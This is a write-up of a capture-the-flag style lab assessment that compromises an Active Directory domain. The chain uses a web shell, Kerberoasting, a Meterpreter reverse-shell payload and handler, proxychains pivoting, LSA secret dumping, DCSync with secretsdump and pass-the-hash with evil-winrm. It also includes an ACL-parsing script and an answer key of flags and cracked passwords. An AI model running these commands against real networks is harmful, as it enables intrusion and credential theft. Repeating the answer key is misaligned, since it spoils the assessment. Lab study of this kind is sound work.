AD Enumeration & Attacks - Skills Assessment Part I

The Scenario

A team member started an External Penetration Test and was moved to another urgent project before they could finish. The team member was able to find and exploit a file upload vulnerability after performing recon of the externally-facing web server. Before switching projects, our teammate left a password-protected web shell (with the credentials: admin:My_W3bsH3ll_P@ssw0rd!) in place for us to start from in the /uploads directory. As part of this assessment, our client, Inlanefreight, has authorized us to see how far we can take our foothold and is interested to see what types of high-risk issues exist within the AD environment. Leverage the web shell to gain an initial foothold in the internal network. Enumerate the Active Directory environment looking for flaws and misconfigurations to move laterally and ultimately achieve domain compromise.

Apply what you learned in this module to compromise the domain and answer the questions below to complete part I of the skills assessment.

Write Up

We first log in to the web shell provided (admin:My_W3bsH3ll_P@ssw0rd!) and, once in, read the first flag from C:\Users\Administrator\Desktop\flag.txt.

Next, we enumerate the SPNs registered in the domain with setspn.exe -Q */*. This only lists accounts with SPNs (the one we care about is MSSQLSvc/SQL01.inlanefreight.local:1433, registered to svc_sql); to Kerberoast we still have to request a TGS ticket for that SPN and export it, which is where Mimikatz comes in.

I then tried to upload Mimikatz, which worked fine, but when I came to run it the web shell hung.

The solution was to create a more stable reverse shell back to my attacking host.

First, generate an msfvenom payload, upload it through the web shell and execute it there; on the attack host, start msfconsole with a handler that matches the payload, LHOST and LPORT exactly, and the callback gives us a Meterpreter session:

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<IP> LPORT=8080 -f exe -o backupscript.exe
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST <IP>
set LPORT 8080
run

Now we can run Mimikatz from the stable session: request a service ticket for the MSSQLSvc SPN, then export the cached Kerberos tickets (kerberos::list /export).

We then convert the exported ticket into a hashcat-compatible $krb5tgs$ line and feed it to hashcat (mode 13100 for an RC4-HMAC ticket); it cracks to lucky7.

We can now connect to MS01 with Enter-PSSession as svc_sql and, once in, read the flag on the Administrator desktop.

Our next job is to find cleartext credentials for another user in the domain. The internal hosts sit on 172.16.6.0/24, which our attack host cannot reach directly, so we first set up a pivot through the Meterpreter session:

run autoroute -s 172.16.6.0/24
use auxiliary/server/socks_proxy
run

Metasploit's autoroute sends traffic for that subnet through the session, and the socks_proxy module exposes it locally. Check that /etc/proxychains.conf points at the proxy Metasploit actually started: auxiliary/server/socks_proxy defaults to SOCKS5 on port 1080, so only one of the following lines should be active, and its version and port must match the module's VERSION and SRVPORT options.

socks4 127.0.0.1 9050
socks5 127.0.0.1 1080

Now we can use NetExec (formerly CrackMapExec) through the proxy to dump the LSA secrets on MS01 with the svc_sql credentials:

sudo proxychains netexec smb 172.16.6.50 -u svc_sql -p lucky7 --lsa

The output contains cached domain credentials, and in this case a cleartext password for another domain user, tpetty.

Enumerating the ACL of the domain object shows that tpetty holds the replication rights (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) needed to perform a DCSync attack, so we can abuse this to pull account secrets straight from the DC and take over the domain. Run secretsdump through the proxy (it prompts for tpetty's password):

proxychains secretsdump.py INLANEFREIGHT/tpetty@172.16.6.3 -just-dc-user administrator

This dumps the Administrator account's NTLM hash.
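What "can perform DCSync" means at the ACL level, as an added example (my code, not from the write-up or any tool): it parses the DACL of a domain object's security descriptor in SDDL form and reports which trustees hold both DS-Replication-Get-Changes and DS-Replication-Get-Changes-All, the pair of extended rights (control-access ACEs) DCSync needs. The SDDL string is constructed for illustration and every SID in it, including the one standing in for tpetty, is hypothetical; the parser understands only the two-letter rights codes, not the hexadecimal rights form.

```python
"""Find trustees with DCSync rights in a domain-head SDDL.
Added example, not from the write-up; the SDDL and SIDs are CONSTRUCTED."""
import re
from collections import defaultdict

# Well-known extended-right GUIDs (constants from the AD schema).
GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"      # DS-Replication-Get-Changes
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"  # DS-Replication-Get-Changes-All
REPL_RIGHTS = {GET_CHANGES: "Get-Changes", GET_CHANGES_ALL: "Get-Changes-All"}


def parse_dacl(sddl: str):
    """Yield (ace_type, rights, object_guid, trustee) for each ACE in the D: section."""
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)
    if not m:
        raise ValueError("no DACL in SDDL")
    for ace in re.findall(r"\(([^)]*)\)", m.group(1)):
        fields = ace.split(";")
        if len(fields) < 6:
            raise ValueError(f"malformed ACE: {ace}")
        ace_type, _flags, rights, obj_guid, _inherit_guid, trustee = fields[:6]
        yield ace_type, rights, obj_guid.lower(), trustee


def rights_tokens(rights: str):
    """Split 'RPWPCRCC' into {'RP','WP','CR','CC'} (two-letter codes only)."""
    return {rights[i:i + 2] for i in range(0, len(rights), 2)}


def replication_rights(sddl: str):
    """Map trustee -> set of replication rights granted by allow ACEs."""
    held = defaultdict(set)
    for ace_type, rights, guid, trustee in parse_dacl(sddl):
        if ace_type not in ("A", "OA"):  # ignore deny and audit ACEs
            continue
        toks = rights_tokens(rights)
        if "GA" in toks or ("CR" in toks and guid == ""):
            held[trustee].update(REPL_RIGHTS.values())  # all extended rights
        elif "CR" in toks and guid in REPL_RIGHTS:
            held[trustee].add(REPL_RIGHTS[guid])         # one specific extended right
    return dict(held)


def dcsync_capable(sddl: str):
    """Trustees holding BOTH replication rights, i.e. able to DCSync every attribute."""
    needed = set(REPL_RIGHTS.values())
    return sorted(t for t, r in replication_rights(sddl).items() if r >= needed)


# Constructed domain-head DACL; S-1-5-21-111-222-333-1115 stands in for tpetty (hypothetical).
SAMPLE_SDDL = (
    "O:DAG:DAD:AI"
    "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)"                                  # Domain Admins: full control
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)"                      # Enterprise DCs
    "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;ED)"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-111-222-333-1115)"  # tpetty: both rights
    "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-111-222-333-1115)"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-111-222-333-1120)"  # only Get-Changes
    "(A;;RPLCLORC;;;AU)"                                                   # Authenticated Users: read
)
```

Calling dcsync_capable(SAMPLE_SDDL) returns the Domain Admins and Enterprise Domain Controllers aliases plus the stand-in tpetty SID; the trustee that only holds Get-Changes is left out, which is the check to do before spending a DCSync attempt on a user who will just get access denied.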

We can now use this hash for a pass-the-hash attack with any tool that supports it; I decided to go for evil-winrm, still through the pivot. Note that -H takes only the NT half of the LM:NT pair secretsdump prints.

proxychains evil-winrm -i 172.16.6.3 -u administrator -H 27dedb1dab4d8545c6e1c66fba077da0

With a shell on DC01, we can complete the last task and read the final flag.

-----

Questions

Submit the contents of the flag.txt file on the administrator Desktop of the web server

JusT_g3tt1ng_st@rt3d!

Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer

svc_sql

Crack the account's password. Submit the cleartext value.

lucky7

Submit the contents of the flag.txt file on the Administrator desktop on MS01

spn$_r0ast1ng_on_@n_0p3n_f1re

Find cleartext credentials for another domain user. Submit the username as your answer.

tpetty

Submit this user's cleartext password.

Sup3rS3cur3D0m@inU2eR

What attack can this user perform?

DCSync

Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01

r3plicat1on_m@st3r!
